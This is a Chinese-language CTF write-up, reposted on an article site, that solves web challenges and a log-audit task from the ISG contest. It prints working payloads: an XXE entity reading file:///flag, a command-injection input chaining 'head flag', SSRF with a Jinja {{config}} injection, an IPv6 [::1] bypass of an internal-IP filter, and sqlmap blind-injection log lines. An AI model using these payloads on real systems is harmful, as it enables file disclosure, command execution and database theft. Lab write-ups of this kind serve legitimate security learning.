美文网首页
isg ctf write up

isg ctf write up

作者: Spring_Bear | 来源:发表于2019-08-27 15:00 被阅读0次

    web1

    web1.png

    右键看源码,得到一段js代码

     $(document).ready(function() {
        $('#button1').click(
            function () {
                var f = new FormData();
                dd=$("form").serializeArray();
                ddd= {}
                for (d in dd){
                    ddd[dd[d]['name']] = dd[d]['value']
                }
                f.append('user_name',ddd['user_name'])
                f.append('!DOCTYPE',ddd['xml'])



                console.log(f)
                $.ajax({
                    type: 'POST',
                    url: '',
                    data: f,
                    success: function(redata){
                        if(redata['code']=='0'){
                            alert('添加成功')
                            window.location.href="/";

                        }
                        else{
                            dddd=redata['info']
                            alert(redata['info'])
                        }
                    },
                    processData: false,
                    contentType: false,
                    dataType: 'json'
                });
        }
        )
        $('#uname').bind('keypress',function(event){
            if(event.keyCode == "13")    
            {
                $('#button1').click()
            }
        });
        
     })

    xxe漏洞,添加xxe poc

    'methodname': '&xxe;', '!DOCTYPE': 'xdsec [<!ELEMENT methodname ANY >\n<!ENTITY xxe SYSTEM "file:///flag" >]'

    web2

    命令注入

    web2.png

    url编码查看flag

    1.1.1.1 %26%26 head flag

    web3

    ssti漏洞

    web3.PNG
    可以看到有提示http://127.0.0.1:1998,所以应该是ssrf,将后面的url换成127.0.0.1:1988并且利用ssti漏洞,即http://192.168.2.122:8110/?isg=http://127.0.0.1:1998?key={{config}},经过url编码可得http://192.168.2.122:8110/?isg=http%3A//127.0.0.1%3A1998%3Fkey%3D%7B%7B%2520config%2520%7D%7D,请求得到flag

    web4

    web4.PNG 
    <?php 
#main.php is good
highlight_file(__FILE__);
function check_inner_ip($url) 
{ 
    $match_result=preg_match('/^(http|https|gopher|dict)?:\/\/.*(\/)?.*$/',$url); 
    if (!$match_result) 
    { 
        die('url fomat error'); 
    } 
    try 
    { 
        $url_parse=parse_url($url); 
    } 
    catch(Exception $e) 
    { 
        die('url fomat error'); 
        return false; 
    } 
    $hostname=$url_parse['host']; 
    $ip=gethostbyname($hostname); 
    $int_ip=ip2long($ip); 
    return ip2long('127.0.0.0')>>24 == $int_ip>>24 || ip2long('10.0.0.0')>>24 == $int_ip>>24 || ip2long('172.16.0.0')>>20 == $int_ip>>20 || ip2long('192.168.0.0')>>16 == $int_ip>>16; 
} 

function safe_request_url($url) 
{ 
     
    if (check_inner_ip($url)) 
    { 
        echo $url.' is inner ip'; 
    } 
    else 
    {
        $ch = curl_init(); 
        curl_setopt($ch, CURLOPT_URL, $url); 
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
        curl_setopt($ch, CURLOPT_HEADER, 0); 
        $output = curl_exec($ch); 
        $result_info = curl_getinfo($ch); 
        if ($result_info['redirect_url']) 
        { 
            safe_request_url($result_info['redirect_url']); 
        } 
        curl_close($ch); 
        var_dump($output); 
    } 
     
} 

$url = $_GET['url']; 
if(!empty($url)){ 
    safe_request_url($url); 
} 

?>

    第一段代码对127.0.0.1进行了检查,所以使用ipv6进行绕过,同时题中给出提示main.php,所以构造请求http://192.168.2.231/web2/?url=http://[::1]/web2/main.php,然后就看到第二段代码

    web4(2).PNG
    然后构造
    http://192.168.2.231/web2/?url=http://[::1]/web2/main.php?code=s:11:%22get_flag();%22
    可以得到flag

    日志审计

    日志审计是一个基于布尔盲注的题,看其中几个日志信息

    172.17.0.1 - - [25/Sep/2018:07:13:01  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(session_id AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 1,1),5,1))>96-- bAne HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:13:01  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(session_id AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 1,1),5,1))>112-- bAne HTTP/1.1" 200 330 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:13:01  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(session_id AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 1,1),5,1))>104-- bAne HTTP/1.1" 200 330 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:13:01  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(session_id AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 1,1),5,1))>100-- bAne HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:13:01  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(session_id AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 1,1),5,1))>102-- bAne HTTP/1.1" 200 330 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:13:01  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(session_id AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 1,1),5,1))>101-- bAne HTTP/1.1" 200 330 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:13:01  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(session_id AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 1,1),6,1))>96-- bAne HTTP/1.1" 200 330 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:13:01  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(session_id AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 1,1),6,1))>48-- bAne HTTP/1.1" 200 330 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:13:01  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(session_id AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 1,1),6,1))>1-- bAne HTTP/1.1" 200 330 "-" "sqlmap/1.2#pip (http://sqlmap.org)"

    可以看出攻击者在猜解session id,可以看到日志中是用二分法进行拆解的,从低位到高位一一猜解,这题题目有点鬼扯,二分法猜解的结果不是flag,猜解的字段是secret,且是按照日志中ascii码值为=号的日志信息得出的flag,即:

    172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),2,1))=108-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),3,1))=97-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),4,1))=103-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),5,1))=123-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),6,1))=98-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),7,1))=105-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),8,1))=110-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),9,1))=100-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),10,1))=95-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),11,1))=115-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),12,1))=113-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),13,1))=108-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),14,1))=95-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),15,1))=105-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),16,1))=115-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),17,1))=95-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),18,1))=97-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),19,1))=119-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),20,1))=101-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),21,1))=115-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),22,1))=111-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),23,1))=109-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),24,1))=101-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
172.17.0.1 - - [25/Sep/2018:07:12:59  0000] "GET /index.php?user=hence' AND ORD(MID((SELECT IFNULL(CAST(secret AS CHAR),0x20) FROM haozi.secrets ORDER BY secret LIMIT 0,1),25,1))=125-- pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"

    写python脚本

    #!/usr/bin/env python

from urllib import unquote

logs = open('access.log').readlines()


res = ''
# filter the flag log
flag_log = []
for log in logs:
    if 'haozi.secrets' in log and 'ORDER' in log and 'session_id' not in log and '0,1' in log and ')=' in log:
        
        log = log.split('GET ')[1].split(' HTTP/1.1')[0]
        print log

        number = log.split('=')[2].split('--')[0]
        print(number)
        print(log)
        print chr(int(number))
        
        res += chr(int(number))

        # flag_log.append(log)

print(res)

    得到flag{bind_sql_is_awesome}。

    相关文章

      网友评论

          本文标题:isg ctf write up

          本文链接:https://www.haomeiwen.com/subject/erglectx.html

          延伸阅读

          深度阅读

          • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

          栏目导航

          热点阅读

          关于我们|服务条款|联系我们|isg ctf write up|投稿指南|网站地图|RSS订阅|排版工具|手机版

          提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

          Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

          备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

          本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

          所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!